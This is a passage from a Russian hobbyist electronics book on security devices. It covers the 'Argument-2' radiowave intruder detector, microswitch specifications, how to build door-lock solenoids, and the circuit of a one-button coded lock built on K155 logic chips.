при температуре 20 °С, % .............. 85±3
атмосферное давление воздуха,мм рт. ст. ..... 200...900
Следующим рекомендуемым к применению изделием промышленного производства для охраны закрытых помещении является извещатель типа «Аргумент-2», который относится к типу охранных объемных радиоволновых электронных устройств. Работает рассматриваемое изделие от сети переменного тока напряжением 220 В частотой 50 Гц или от автономного источника питания напряжением 12 В постоянного тока. В качестве автономного БП может быть использован источник питания «Электроника Д2-27», который имеет высокие технические характеристики. В состав этого изделия входят сетевой понижающий трансформатор питания, выпрямительное устройство и стабилизатор напряжения постоянного тока 12 В.
Рассматриваемый охранный объемный радиоволновый извещатель «Аргумент-2» устанавливается внутри помещения в местах наиболее вероятного нахождения постороннего лица при проникновении его в это помещение. Устройство охраны обеспечивает высокую обнаружительную способность, отсутствие ложных тревог при эксплуатации в помещениях с работающим оборудованием, установку и работу нескольких излучателей-извещателей в одном помещении, дистанционное управление. При проникновении постороннего лица в зону действия датчика излучателя охраняемое пространство закрытого помещения изменяет действующее внутри него электромагнитное поле, которое, в свою очередь, приводит к срабатыванию системы и формированию тревожного извещения размыканием выходных контактов исполнительного реле. Размыкание контактов реле приводит в действие световые или звуковые индикаторы и радиоизлучатель.
Активные зоны действия электронного охранного извещателя типа «Аргумент-2» в горизонтальной и вертикальной плоскостях приведены на рис. 3.4, где по осям абсцисс и ординат откладываются радиусы действия устройсва, дающие в сумме объемную картину электромагнитною поля, по типу приемно-передающей антенны.
Рис. 3.4. Схема зоны обнаружения постороннего лица:
а—в горизонтальной плоскости: б — ввертикальной плоскости.
Основные электрические параметры и технические характеристики излучателя «Аргумент-2»
Номинальное напряжение питающей сети
переменного тока,В .................... 220
Номинальная частота питающей сети
переменного токи, Гц .............. . . 50
Номинальное cтабилизированное напряжение питания функциональных узлов устройства постоянным током, В ........... ....... . . 12
Пределы изменения напряжения питающей сети
переменного тока, % ........ . . —10...+15
Пределы изменения частоты питающей сети
переменного тока, % ................ —1
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ............. 12
Дальность действия активного элемента устройства в закрытом помещении, м:
максимальная ...................... 16
минимальная ........................ 3
Активная площадь обнаружения посторонних лиц, м^2,
не менее ............................ 100
Объем закрытою помещения, обслуживаемый одним датчиком, м3, не менее ................... 250
Ток, потребляемый устройством в режиме
холостого хода, мА, не более ............... 80
Диапазон рабочих частот, МГц, в пределах которых устанавливается одна частота для конкретного объекта охраны ....................... 140...210
Длительность полного провала напряжения
питающей сети переменного тока, мс, не менее . . 250 Срок службы устройства при круглосуточном
включении датчика, ч, не менее ............. 5000
Вероятность безотказной работы устройства
при риске заказчика в=0,95, не менее ........ 0,99
Помехозащищенность электронного датчика при воздействии внешнего электромагнитного поля, дБ, не менее ......................... 120
Сопротивление изоляции токоведущих частей
относительно друг друга, МОм, не менее ....... 10
Условия эксплуатации:
температура окружающей среды, С ........ —30...+50
относительная влажность воздуха
при температуре 25 °С, %, не менее ....... 85
атмосферное давление воздуха, мм рт. ст. ..... 200...1000
Габаритные размеры, мм .................. 90х65х45
Гарантийный срок службы, г ................ 1
Конструктивно охранный извещатель «Аргумент-2» выполнен в виде прямоугольника сравнительно небольших размеров, который устанавливается на специальном кронштейне. При использовании рассматриваемого датчика в составе комплексной сторожевой системы предусмотрено применение автоматического дистанционного управления, которое позволяет включать его вторично после срабатывания ИМ звукового или светового оповещения. В этом случае данный извещатель становится дублирующим устройством с автономной передачей радиосигнала на ЦПУ с помощью радиоволн, работающих на выбранной частоте. Если будет вскрыта и заблокирована первая ступень защиты, то данная вторая ступень сработает вторично и предупредит о несанкционированном вторжении в охраняемое помещение.
Проблема охраны закрытых помещений с помощью объемных радиоволновых извещателей решается в полной мере только в том случае, если вся информация приходит на ЦПУ и действует система постоянного наблюдения и отслеживания.
Технические характеристики и основные электрические параметры некоторых типов электронных извещателей, изготавливаемых промышленным способом, приведены в табл. 3.5.
Особую группу датчиков, применяемых в сторожевых и сигнальных устройствах, составляют конечные выключатели, которые используются для коммутации электрических цепей постоянного или переменного тока. Часто применяются малогабаритные кнопки типа КМ, командные кнопки типа КН, кнопочные переключатели типа КП и микропереключатели типа МП.
Основные электрические параметры микропереключателей типа МП при различных видах нагрузки приведены в табл. 3.6.
Малогабаритные кнопочные переключатели типа КМ выпускаются двух типоразмеров: КМ1-1 и КМ2-1, они рассчитаны на эксплуатацию в самых жестких условиях воздействия климатических, механических, биологических и электромагнитных нагрузок. Микропереключатели этого типа обеспечивают коммутацию электрических цепей с активной нагрузкой постоянного тока от 0,0005 до 4 А с напряжением от 0,5 до 30 В и переменного тока частотой 50...400 Гц от 0,0005 до 3 А с напряжением от 0,5 до 250 В. Износостойкость переключателей составляет 10000 циклов переключений из положения «выключено» в положение «включено» и возвращение их в положение «выключено».
Модульные переключатели типов П2К и П2КЛ изготавливаются во всеклиматическом исполнении для эксплуа-
Таблица 3. 5. Основные электрические параметры и технические характеристики электронных извещателей
тации при температуре от —10 до 40 °С, относительной влажности воздуха до 90%, при температуре 25 °С и пониженном атмосферном давлении воздуха до 5 мм рт. ст. Эти переключатели составляются из отдельных ячеек (модулей) с различным числом контактных групп. Изготовляются пять типов модулей с числом контактных групп на переключение 2; 4; 6; 8. Все ячейки переключателя П2К имеют одинаковые размеры, за исключением длины, которая зависит от числа контактных групп. Переключатель П2К может состоять из одной ячейки и в таком виде применяется, как правило, в сторожевых устройствах. Допустимый постоянный ток через контакты при активной нагрузке равен 0, 1 А при напряжении 250 В и 1 А при напряжении 12 В; допустимый переменный ток через контакты равен 0, 2 А при напряжении до 250 В частотой 50 Гц и равен 1, 5 А при напряжении 12 В. Емкость между контактами не превышает 1, 5 пФ; тангенс угла диэлектрических потерь на частоте 1 МГц — не более 0, 05; сопротивление изоляции постоянному току в нормальных условиях не менее 50 МОм.
К числу переключателей с повышенной износостойкостью, надежностью и долговечностью относятся переключатели типа КМ, которые могут коммутировать электрические цепи постоянного и переменного тока с напряжением от 10 до 50 В и током от 0, 05 до 1, 5 А. Изготавливается командный кнопочный переключатель в виде трех типоразмеров: КН-1 однополюсного включения, КН-2 — двухполюсного включения и КН-П — однополюсного включения—выключения. Износостойкость этих переключателей составляет не менее 15000 циклов переключении.
Микропереключатели типа МП, представленные в табл. 3. 6, являются наиболее часто применяемыми в сторожевых устройствах. Перед установкой этих микропереключателей в качестве датчиков после длительного хранения необходимо произвести их тренировку (не менее 100 циклов). Износостойкость микропереключателей составляет 10 000 циклов переключении. Сопротивление изоляции при нормальных условиях эксплуатации — не менее 1000 МОм. Масса переключателей типов МП1-1, МПЗ-1, МП5 равна 3, 5 г, типов МП9, МП10, МП11 — 2, 7 г, типа MП7 — 0, 8 г, МП 12 — 0, 7 г.
В составе всех электронных и электромеханических сторожевых устройств с автоматическим управлением кроме датчиков и блоков электроники имеются ИМ и узлы. Необходимо заметить, что к процессам управления относятся: приведение в действие устройства (включение, пуск, подключение), прекращение действия (остановка, выключение) и регулирование. При автоматическом управлении сторожевыми устройствами в качестве датчиков используются контактные, автономные, реостатные, электролитические, проволочные, индуктивные, фотоэлектрические датчики, а также датчики температуры.
Также обязательным элементом электрической схемы сторожевого устройства является ИМ, устанавливаемый фактически на механических или электромеханических замках. Наиболее часто применяемыми исполнительными устройствами являются электрические магниты и соленоиды как промышленного, так и самодельного изготовления. Электропитание этих изделий осуществляется, как правило, от источников постоянного тока с низковольтным напряжением и малым потреблением тока. Например, для открывания дверного замка с защелкой может быть рекомендован электромагнит с питанием от выпрямителя постоянного тока 24 В, рассчитанного на ток от 0,25 до 0,5А. На рис. 3.5 приведена конструкция электромагнита, который развивает тяговое усилие не менее 3 кгс при указанных электрических параметрах. Самодельный электромагнит состоит из следующих деталей: 1 — гайка регулировочная; 2 — каркас катушки, состоящий из двух щечек и гильзы, изготавливаемых из гетинакса или пластмассы; 3 — опорный диэлектрический вкладыш-втулка, жестко закрепляемый в отверстии катушки; 4 — обмотка электромагнита (2700 витков провода ПЭВ-2 диаметром 0,31 мм, уложенных рядами виток к витку); 5 — пружина возвратная; 6 — шпилька Мб направляющая двусторонняя; 7 — сердечник; 8 — скоба-тяга, служащая для соединения с защелкой механического замка.
Сердечник электромагнита изготавливается из мягкой электротехнической стали марки 3311, 3312 или 3313. Конструкция сердечника определяет форму и размеры каркаса катушки и габаритные размеры электромагнита. Ход сердечника внутри катушки должен быть не менее 18 мм.
На рис. 3.6 дана конструкция тягового электромагнита, изготовленного из трансформатора питания или из дросселя фильтра типа Ш броневой конструкции. Рекомендуется выбрать такой трансформатор или дроссель, у которого магнитопровод выполнен методом шихтования из пластин электротехнической стали типа Ш20Х20. Для того чтобы изготовить тяговый электромагнит, необходимо произвести полную разборку трансформатора и выполнить следующую работу.
1. Из Ш-образных пластин вырезать центральные части магнитопровода, на которые устанавливается катушка с намотанными на нее проводами.
Рис. 3. 5. Конструкция тягового электромагнита с круглым магнитопроводом.
Рис. 3. 6. Конструкция тягового электромагнита, изготовленного из трансформатора типа Ш.
2. Собрать вырезанные части магнитопровода в пакет, скрепив его в двух местах немагнитными заклейнками.
3. Вырезать из стального листа толщиной 2 мм две накладки, контур которых полностью повторяет контур магнитопровода, представляющего собой замкнутый прямоугольник с размерами 80Х70 мм по наружному периметру и 60Х50 по внутреннему. По углам накладок просверлить четыре отверстия диаметром 4,5 мм.
4. Собрать все разрезанные части пластин магнитопровода в пакеты, закрыть их с обеих сторон накладками и скрепить немагнитными заклепками или шпильками.
5. Изготовить новый каркас катушки из гетинакса или стеклотекстолита толщиной 1 мм, с размерами, обеспечивающими установку катушки внутри магнитопровода. Внутреннее отверстие каркаса должно иметь размеры 20,5Х20,5 мм.
6. Намотать на каркас катушки провод марки ПЭЛ (ПЭВ-1, ПЭВ-2, ПЭТВР) диаметром 0,25 мм рядовым способом (виток к витку) в количестве 3000 витков.
7. Закрепить катушку с обмоточным проводом и магнитопровод в единую конструкцию и произвести пропитку изоляционным лаком.
8. Собрать и закрепить якорь электромагнита, как показано на рис. 3.6.
В состав электромагнита входят следующие основные детали конструкции: 1— магнитопровод в сборе; 2 — якорь в сборе; 3 — скоба (2 шт); 4— скоба-тяга, соединяющая якорь с защелкой механического замка; 5 — немагнитная заклепка; 6 — накладка (2 шт); 7 — обмотка электромагнита; 8 — каркас катушки; 9 — немагнитная заклепка.
Таблица 3.6. Основные электрические параметры микропереключателей типа МП
3. 3. ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ОДНОКНОПОЧНЫМ УПРАВЛЕНИЕМ
Электронное устройство с индикаторным управлением, работающее от одного замыкающего переключателя, предназначено для эксплуатации в условиях УХЛ. Устанавливается устройство на входных дверях жилых и производственных помещений. Работает сторожевое устройство как от сети переменного тока напряжением 220 В частотой 50 Гц, так и от автономного источника питания напряжением 9 В постоянного тока. При этом питание ИМС обеспечивается стандартным напряжением 5 В.
Отличительной особенностью рассматриваемого изделия является наличие в его составе счетно-решающего устройства, позволяющего кодировать, и дешифровать определенное число цифр и использовать то устройство в качестве кодового замка, управляемого одной кнопкой по сигналам светодиода, используемого для отсчета порядковой цифры кода. При этом набор каждой цифры осуществляется только при замкнутых контактах переключателя SB1 то есть. при нажатии этой кнопки и отпускании ее в момент отсчета очередной кодовой цифры.
Сторожевое устройство, оснащенное специальным ИМ, может быть использовано также для блокировки открывания обычных механических врезных замков, устанавливаемых как на наружных, так и на внутренних дверях помещений бытового и хозяйственного назначения, например на садово-огородных и приусадебных участках. Одно такое устройство может охранять только один объект. При этом обеспечивается двойная защита от открывания дверей, так как даже при наличии необходимого ключа замок невозможно открыть без знания четырех- или восьмизначного кода.
Незначительная конструктивная доработка врезного механического замка любой конструкции, заключающаяся в установке дополнительного стопора, который работает от маломощного тягового магнита или от электромагнитного реле, доступна начинающему радиолюбителю в домашней мастерской.
Сторожевое устройство может быть рекомендовано также для охраны гаражей и складских помещений при эксплуатации в условиях повышенной влажности (до 98%) и при температуре окружающей среды от —35 до 45 °С.
Принципиальная электрическая схема электронного сторожевого устройства с однокнопочным индикаторным управлением, его электронной части приведена на рис.3.7. Как следует из схемы, сторожевое устройство включает в свой состав входные цепи с защитой от помех, проникающих в промышленную электросеть, и с защитой от перенапряжения и коротких замыканий, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостный фильтр, стабилизатор напряжения, автономный источник питания постоянного тока, кодирующее, счетно-решающее устройство с управляющей системой и ИМ.
Входные цепи предназначены для подключения сторожевого устройства к сети переменного тока напряжением 220 В частотой 50 Гц и защиты его электронной части от проникающих в сеть питания электромагнитных помех низкой частоты. Для этого во входной цени установлен емкостный фильтр, собранный из конденсаторов С1 и С2. Плавкий предохранитель F1 обеспечивает дополнительную защиту всего устройства от коротких замыканий, он рассчитан на максимальный ток 0,25 А. Подключается сторожевое устройство к сети с помощью стандартного электрического соединителя тина «вилка»,обозначенного на схеме X1.
Сетевой понижающий трансформатор питания Т1 может быть выбран из унифицированного ряда или изготовлен в домашней мастерской на броневом магнитопроводе типа Ш или ШЛ, моточные данные которого приведены в табл.3.7. При самодельном изготовлении трансформатор должен содержать три обмотки: одну первичную, рассчитанную на напряжение 220 В переменного тока, и две вторичные обмотки, обеспечивающие заданный уровень выпрямленных напряжений постоянного тока 5 и 9 В.
Сетевой трансформатор питания кроме трансформации напряжения обеспечивает полную гальваническую развязку всех вторичных цепей электронной схемы устройства от сети высокого напряжения переменного тока и надежную защиту и электробезопасность при наладке устройства.
Таблица 3.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве с однокнопочным управлением
Для получения повышенного качества, надежности и долговечности трансформатора необходимо обеспечить соблюдение определенных правил при проведении технологических операций изготовления трансформатора. Это в первую очередь касается процесса рядовой укладки обмоточных проводов, межслойной изоляции и пропитки витков нитролаком. Трансформатор питания имеет одну катушку каркасной конструкции, которая устанавливается на центральном стержне магнитопровода. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4 см2. Магнитопровод с увеличенным сечением стали потребует большего объема и площади при установке на шасси. Между первичной и вторичными обмотками трансформатора через изоляционные прокладки наматывается один слой обмоточного провода диаметром 0,21...0,31 мм или медной ленты плотно виток к витку, рядовой намоткой. Этот слой обмоточного провода является экраном, который защищает трансформатор и устройство в целом от различных электромагнитных помех внешнего поля, действующего в первичных цепях.
Магнитопровод трансформатора питания вместе с катушкой должен быть закрыт защитным кожухом, который кроме функции механической защиты от случайных повреждений обмоточного провода дополнительно защищает и от наведенных электромагнитных полей, предотвращая ложные срабатывания. Для изготовления трансформатора Т1 лучше всего воспользоваться готовым ленточным магнитопроводом витой конструкции типа ШЛ20Х20 или ШЛ20Х25.
Рекомендуется при сборке устройства установить трансформатор на металлическом шасси, изготовленном из дюралюминия толщиной не менее 2 мм. На нем же можно укрепить плату с комплектом выпрямительных диодов.
На выходе вторичных обмоток трансформатора собрано два выпрямителя на восьми маломощных диодах VD1—VD8, которые преобразуют переменный ток частотой 50 Гц в постоянное напряжение 5 и 9 В. Оба выпрямителя работают на емкостные фильтры, собранные на оксидных электролитических конденсаторах. Выпрямители смонтированы по однофазным двухполупериодным мостовым схемам, каждый на четырех полупроводниковых диодах. Примененная в данном случае выпрямительная мостовая схема характеризуется повышенной частотой пульсации выпрямленного напряжения постоянного тока, достаточно высоким коэффициентом использования габаритной мощности сетевого понижающего трансформатора, малым значением обратного напряжения и тока на полупроводниковых диодах, повышенными потерями и несколько меньшим кпд по сравнению с другими типами выпрямительных схем (однополупериодной; со средним выводом и т. д.).
Необходимо отметить, что наиболее часто мостовые схемы применяются в различных радиолюбительских конструкциях, обеспечивая достаточно высокий уровень выпрямленного тока (40...500 мА) в зависимости от примененных полупроводниковых выпрямительных диодов.
Первый выпрямитель собран на диодах VD1—VD4, второй — на диодах VD5—VD8. На входах выпрямителей и соответственно на вторичных обмотках трансформатора питания Т1 действует переменное напряжение до 6,3 В и до 12 В.
Электролитические конденсаторы СЗ, С4 и С5 дополнительно сглаживают пульсации выпрямленного напряжения, образуют емкостные фильтра. При этом конденсатор С5 установлен после ПСН.
На выходе первого выпрямителя VD1—VD4 собран ПСН, обеспечивающий электропитание микросхем счетно-решающего узла сторожевого устройства постоянным напряжением +5 В. Подключение всех примененных в устройстве ИМС к данному источнику питания показано на рис. 3.7. К выводу 14 ИМС DA1 и DA2, к выводу 5 ИМС DA3 и DA4, к выводу 16 ИМС DA5 и DA6 подключается стабилизированное напряжение 5 В.
ПСН собран на двух стабилитронах VD9 и VD10, которые обеспечивают коэффициент сигнализации не менее 100 и являются одновременно источниками образцового напряжения. Перед подключением ИМС к стабилизатору напряжения в указанных на схеме токах необходимо убедиться в том, что входное напряжение удовлетворяет требованию: Uвх min <=Uвх<=Uвх max. При токе нагрузки Iн<=0,025 А и номинальном выходном напряжении 5 В значения указанных параметров должны иметь следующие значения: Uвхmin = 6...8 В; Uвх max = 7...9,5 В; Rвых max == 0,15 Ом; Uвых = 5 В. Измерения производятся при отсутствии нагрузки, то есть на холостом ходу.
Второй выпрямитель также собран по мостовой схеме на четырех полупроводниковых диодах VD5—VD8, он обеспечивает на выходе выпрямленное напряжение постоянного тока 9 В и работает на емкостный фильтр.
Подключаемая к выпрямителю нагрузка не превышает 100 мА. На выходе второго выпрямителя собрана электронно-механическая система защиты, которая предотвращает повреждение как дорогостоящих элементов самого выпрямителя и стабилизатора, так и схемы нагрузки при коротких замыканиях и перегрузках. Ток, при котором срабатывает система защиты, равен 100...110 мА.
В составе защитного устройства собран стабилизатор постоянного напряжения, защищенный также от выхода из строя при отключенной нагрузке. Для этого на выходе установлен двухваттный резистор, который поддерживает нормальный режим работы элементов стабилизатора. Стабилизатор образован транзистором VT2 и стабилитроном VD11 и обеспечивает напряжение пульсации, которое незначительно при максимальном токе нагрузки и не превышает 10 мВ. Собранная в составе данного устройства система защиты включает в свой состав два электромагнитных реле К1 и К2, транзистор VT1, резисторы R1—R3 и индикаторную лампу H1.
При коротком замыкании в выходных цепях после точек А и Б или в подключенной к ним схеме сторожевого устройства, как только ток через проволочный резистор R1 превысит заданное максимальное значение (100...110 мА), срабатывает на открывание транзистор VT1, через который напряжение поступает на электромагнитное реле К2. Реле срабатывает, замыкая свои контакты К2.1. Вслед за этим напряжение питания будет подано на обмотку электромагнитного реле К7, оно сработает и разомкнет контакты К1.1, отключив нагрузку сторожевого устройства от сети питания.
Таким образом, если постороннее лицо захочет отключить питание и обесточить сторожевое устройство, думая, что сможет открыть механический замок обычным ключом, то у него это не получится, так как только знание секрета стопорения механической части сторожевого устройства (замка) сможет обеспечить беспрепятственное открывание дверей. Здесь необходимо заметить, что сторожевое устройство после включения питания не только сохраняет свой код, но и тут же готово к дальнейшей работе.
В схеме защиты сторожевого устройства установлена сигнальная лампа H1 и параллельно ей смонтирован резистор R3, через который протекает ток, удерживающий якорь реле К1 в нормальном положении и предотвращающий повторное срабатывание. После срабатывания системы защиты необходимо отключить электропитание и вновь включить, замкнув контакты переключателя S1.
В точках А и Б принципиальной схемы может быть подключен автономный источник питания—ХИТ любого типа, имеющий на выходе напряжение питания постоянного токя 9В и отвод, на котором должно действовать напряжение 5...6 В.
Счетно-решающее устройство — основная часть электронной схемы сторожевого устройства — включает в свой состав шесть ИМС, работающих в режиме счета и сравнения с установленным заранее кодом. Для более полного описания принципа работы сторожевого устройства введем следующие обозначения и определения элементов ИМС:
элемент ИМС DA1 с выводами 8...13 образует триггер;
элемент ИМС DA3 с выводами 1...3, 8, 9, 11, 12 и 14 образует счетчик числа импульсов;
элемент ИМС DA4 с выводами 1...3, 8, 9, 11, 12 и 14 образует счетчик числа импульсов;
элемент ИМС DA1 с выводами 2.. .6 образует триггер;
элемент ИМС DA2 с выводами 1...3 образует инвертор, который вместе с транзистором VT1 образует тактовый генератор;
элемент ИМС DA2 с выводами 4.. .6 образует триггер;
элемент ИМС DA2 с выводами 1...3 образует инвертор;
элемент ИМС DA2 с выводами 11...13 образует триггер;
микросхема DA5 является дешифратором заданного кода при его наборе на пульте управления сторожевого устройства;
микросхема DA6 является мультиплексором. Исходя из классификации электронных устройств и изделий и определений, принятых в технической литературе и государственных стандартах, триггером называется электронное переключающее устройство, которое сколь угодно долго сохраняет одно из двух своих состояний устойчивого равновесия и скачкообразно переключается по сигналу извне из одного состояния в другое; инвертором называется электронное устройство, преобразующее сигнал низкого уровня логического нуля на входе в сигнал высокого уровня логической единицы на выходе и наоборот, что эквивалентно операции отрицания; тактовым генератором называется устройство, вырабатывающее электрические сигналы — колебания с заданной частотой; дешифратором
называется устройство для автоматической расшифровки (декодирования) сообщения и переиода содержащейся в нем информации на язык (код) воспринимающей системы.
ИМС DA4 распознает в процессе работы цифры, набираемые при замыкании контактов переключателя S1 по числу зажигания светодиода HL1.
Перед началом эксплуатации сторожевого устройства необходимо произвести операцию установления нужного кода, которая осуществляется включением соответствующих перемычек между выводами мультиплексора (ИМС DA6) и выводами дешифратора (ИМС DA5). При этом следует иметь в виду, что набор номера кода на дешифраторе начинается с вывода 7, которому соответствует первая набранная в коде цифра 5 (в данном случае). Этот вывод, равно как и последующие, можно соединять с выводами мультиплексора (DA6) практически в любой последовательности (с 1—4 и с 12—15).
Выводу 6 ИМС DA5 соответствует цифра 6 кода сторожевого устройства, выводу 5 — цифра 7, выводу 4 — цифра 8, выводу 9 — цифра 1, выводу 10 — цифра 2, выводу 11 — цифра 3, выводу 12 — цифра 4.
Если соединить выводы ИМС DA5, как показано на рис. 3.7, с выводами мультиплексора DA6, то будет закодировано число из 8 цифр: 66112233.
Для того чтобы более точно устанавливать шифр (код) сторожевого устройства, необходимо смонтировать параллельно друг другу (лучше на лицевой панели корпуса сторожевою устройства) две планки с восьмью контактными приборными зажимами, к которым подключаются выводы ИМС DA5 и DA6. Если к контактам первой планки подключить выводы от ИМС DA5 сверху вниз, как показано на схеме, то мы будем иметь восьмиразрядный набор шифра сторожевого устройства от 1 до 8 при условии, что соединения всех остальных выводов ИМС останутся такими же, как на схеме.
Таким образом, на первой планке, соединенной с дешифратором DA5, необходимо сделать гравировку или выполнить надписи от 1 до 8, соответствующие набираемому коду. При этом у выхода АО (вывод 5 ИМС DA5) должна быть проставлена цифра 5 будущего кода. У выхода А1 — цифра 2 и т. д. На второй параллельной планке, контакты которой соединены с выводами мультиплексора ИМС DA6, также должны быть написаны цифры от 1 до 8, соответствующие порядку считывания набранного кода
этим устройством в автоматическом режиме работы. Цифры на этой планке располагаются по порядку: 1, 2... 8. При этом первой цифре автоматического счета соответствует выход Д0 (вывод 4) и т. д.
Порядок соединений контактов на параллельных планках сторожевого устройства приведен в табл. 3. 8.
Таблица 3. 8. Порядок соединений контактов при кодировании и считывании кода
Например, если контакты на параллельных планках соединить с выводами ИМС DA5 и DA6 следующим образом: вывод 6 DA5 с выводами 4 я 3 DA6; вывод 9 DA5 с выводами 2 и 1 DA6; вывод 10 DA5 с выводами 14 и 15 DA6;
вывод 11 DA5 с выводами 7 и 8 DA6, то мы получим указанный выше код сторожевого устройства 66112233. Еще один пример кодирования сторожевого устройства при соединении контактов на параллельных планках. Соединяя выводы DA5 с выводами DA6 в следующей последовательности: 5 с 4; 10 с 3; 7 с 2; 11 с 1; 6 с 15; 12 с 14; 4 с 13;
9 с 12, получим новый шифр устройства: 72536481, который необходимо запомнить для точного воспроизведения при дешифровании и открывании дверей. Очевидно, что в данном случае может быть выбрано любое произвольное сочетание восьми цифр кода, известное лишь его владельцу. В рассматриваемом варианте случайного набора кода необходимо выполнить 40320 операций, каждый раз запоминая или записывая пройденный набор цифр. Это практически непосильная задача для злоумышленника.
Набор шифра сторожевого устройства во всех случаях производится только после полной сборки всех узлов и блоков и необходимой проверки их работоспособности. Для удобства перекодирования шифра планки на лицевой панели устройства снабжаются приборными малогабаритными контактными зажимами типа КМЗ-1. Длина монтажных проводников, соединяющих зажимы с выводами ИМС, должна быть минимальной. Монтаж этих проводников рекомендуется осуществлять как пайкой, так и под резьбовые соединения. Конструкция электрической части сторожевого устройства определяется примененными ЭРИ и ЭРЭ, и в первую очередь расположением крупногабаритных элементов. Размеры по высоте и ширине могут быть произвольными и зависят не только от габаритов сетевого трансформатора, но и опыта и материальных возможностей домашнего мастера. Наиболее технологичной является прямоугольная конструкция, например, рекомендуется применять унифицированную базовую конструкцию «База-3» и «База-4».
Работает сторожевое устройство следующим образом. После включения устройства в сеть переменного тока или при подключении его к устройству автономного питания и замыкания контактов переключателей S1 или S2 сторожевое устройство подготовлено к работе и находится в ждущем режиме. В этот момент можно обычным ключом закрыть входную дверь и в замке сработает блокировочный упор электромагнита. Индикаторные лампы не светятся, и теперь открыть дверь ключом без снятия блокировки невозможно. Сторожевое устройство включено в режим холостого хода. Вариант конструкции блокировочного узла, работающего от электромагнита, рассмотрим ниже.
Электронная часть сторожевого устройства с мультиплексором и дешифратором в начальном состоянии находится в ждущем режиме. ИМС, выполняющие роль счетчиков при правильном наборе кода, дают электрический сигнал на ИМ, разрешающий открывание замка ключом. Основными элементами этой схемы являются мультиплексор и демультиплексор, которые определяют правильность набора кода.
Следует отметить важную особенность сторожевого устройства, заключающуюся в том, что работает оно от одного электрического соединителя SBI, а отсчет числа срабатывании осуществляется визуально по вспыхиванию светодиода зеленого или красного цвета. Если светодиод вспыхнул три раза и в это время контакты переключателя SB1 будут разомкнуты, то это значит, что была набрана цифра 3 кода. Но она должна находиться в строго определенном месте кода при его расшифровке. Для расшифровки кода и получения возможности открыть дверь не обходимо последовательно набрать все восемь цифр установленного кода. Для этого необходимо замкнуть контакты (нажать кнопку) переключателя SB1 и подать питание на ИМС DA1 (вывод 12), триггер которой срабатывает на инверторном выходе (вывод 9), и появится высокий уровень логической единицы, который приведет оба счетчика импульсов ИМС DA3 и DA4 в исходное состояние. При этом второй триггер ИМС DA1 (выводы 2. ..6) срабатывает, и при правильном наборе первой цифры начинает работать генератор импульсов (транзистор VT1) и инвертор ИМС DA2 (выводы 1...3).
Работа сторожевого устройства начинается сразу же после замыкания контактов переключателя SB1. После включения первого триггера ИМС DA1 (выводы 8. ..13} начинает работать счетчик ИМС DA3, который будет переключать свои разряды постоянно от 0 до 15, пока замкнуты контакты переключателя SB1 и при каждом переключении будет вспыхивать индикаторный светодиод VD13. Выбор необходимой цифры кода определяется числом включений светодиода. Если разомкнуть контакты переключателя SB1 в момент шестого включения, то закодированная цифра равна 6. Лучше всего для данной схемы сторожевого устройства использовать переключатель с кнопочным управлением. Для набора любой цифры кода, например 5, необходимо нажать на кнопку SB1, отсчитать пять вспышек светодиода и отпустить ее в этот момент.
Нет, видимо, необходимости во всех подробностях описывать внутренние процессы в ИМС при замыкании контактов переключателя SB1. Отметим только, что при первом нажатии на кнопку переключателя счетчик, собранный на ИМС DA1, начинает работать и загорается светодиод HL1 (VD13), вслед за этим на выходе мультиплексора DA6 (вывод 6) появляется высокий уровень логической единицы, который передается на триггер ИМС
DA2 (вывод 2). Если разомкнуть контакты переключателя SB1 сразу же после первого загорания светодиода, то начальная цифра кода равна 1 и не соответствует закодированной. При этом на выводе 9 счетчика DA3 появляется высокий уровень логической единицы, который откроет выход дешифратора DA5 (выход 10). После следующего включения откроется следующий выход дешифратора (вывод 11) и т. д.
При правильном последовательном наборе всех цифр кода открываются также последовательно входы мультиплексора DA6. После первой правильной цифры низкий уровень логического нуля появляется на выводе 3 ИМС DA6, после второй цифры 6 — на выводе 2 этой же микросхемы, после третьей правильной цифры 1 низкий уровень появляется на выводе 1 ИМС DA6 и т. д.
Если кнопка SB1 набора кода отпускается в момент, не соответствующий правильной цифре, то последующие входы микросхемы будут закрыты и набор кода не состоится.
Когда набраны правильно все цифры кода, срабатывает счетчик, собранный на ИМС DA4, подготавливая передачу сигнала на ИМ (электромагнит или электромеханическое реле) через транзистор VT2, выполненный по схеме усилителя тока. Время горения светодиода и паузы между вспышками регулируются подбором сопротивлений резисторов и емкостей конденсаторов, включенных в схему генератора.
Как следует из схемы, в данном сторожевом устройстве при неправильном наборе кода сигнал тревоги не предусмотрен, так как замок без набора кода просто не открыть. Конструкция сторожевого устройства и стопора в замке может быть выполнена домашним мастером в нескольких вариантах. Суть стопорения подвижного язычка механического замка состоит в том, что в замке устанавливается дополнительный упор, который препятствует открыванию и который вытягивается из углубления язычка замка при срабатывании электромагнита (ИМ). Эти упоры могут быть установлены как на наружной части (крышке) замка, так и внутри его конструкции. Например, можно выполнить сам стопор в виде штыря, конец которого входит в отверстие подвижной части механического замка. Это отверстие можно просверлить по месту установки электромагнита или электромагнитного реле.
При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К155ТМ2, DA2 — К155ЛА12, DA3 — К155ИЕ5, DA4 — К155ИЕ5, DA5 — К155ИД4, DA6 — К155КП7; транзисторы VT1 типа КТ342А, VT2 — П214В, VT3 — КТ315Б, VT4 — КТ814А;
